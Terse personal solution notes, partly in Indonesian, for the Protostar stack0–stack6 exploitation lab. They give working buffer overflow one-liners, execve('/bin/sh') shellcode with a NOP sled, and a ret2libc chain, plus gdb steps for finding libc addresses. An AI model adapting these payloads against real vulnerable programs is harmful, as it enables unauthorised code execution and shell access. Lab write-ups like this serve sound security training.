Protostar
- stack0
python -c "print 'a'*65" | ./stack0
- stack1
esp = esp-0x60
buff = esp+0x1c
nilai= esp+0x5c
nilai = esp-0x60+0x5c
buff = esp-0x60+0x1c
-------------------- -
= 0x40
./stack1 `python -c "print 'a'*0x40+'dcba'"`
- stack2
printenv
esp = esp-0x60
aaa = esp+0x18
bbb = esp+0x58
bbb = esp-0x60+0x58
aaa = esp-0x60+0x18
------------------- -
= 0x40
export GREENIE=`python -c "import struct; print 'a'*0x40+struct.pack('I', 0x0d0a0d0a)"`
- stack3
esp = esp-0x60
int = esp+0x1c
bff = esp+0x5c
python -c "import struct; print 'a'*(0x40) + struct.pack('I', 0x08048424)" | ./stack3
- stack4
python -c "import struct; print 'a'*(0x50-0x10+0x8+0x4)+struct.pack('I',0x080483f4)" | ./stack4
penjelasan 0x8+0x4 tdk tau :)
- stack5
buffer sampai ebp = 76
tinggal milih2 return ke mana, perhatikan memori run dng gdb berbeda, jd pinter2 nebak
agar aman saat return, maka diamankan dengan nop(0x90)
(python -c "import struct; print 'a'*76 + struct.pack('I', 0xbffff800+30) + '\x90'*100 + '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'"; cat) | ./stack5
- stack6
gdb ./stack6
break *main
r
^C
p system
#0xb7ecffb0
info proc map
#0xb7e97000 <-> /lib/libc-2.11.2.so
quit
strings -a -t x /lib/libc-2.11.2.so | grep -i "/bin/sh"
# 11f3bf
gdb ./stack6
break *main
r
^C
x/s 0xb7e97000+0x11f3bf
(python -c "import struct; print 'a'*(0x4c+0x4)+struct.pack('I', 0xb7ecffb0)+'\x90'*4+struct.pack('I',0xb7e97000+0x11f3bf)"; cat) | ./stack6
'\x90'*4 : materi tentang perbedaan call & ret, karena ret tdk menyusun stack return maka '\x90'*4 dijadikan fungsi ret oleh fungsi yg dipanggil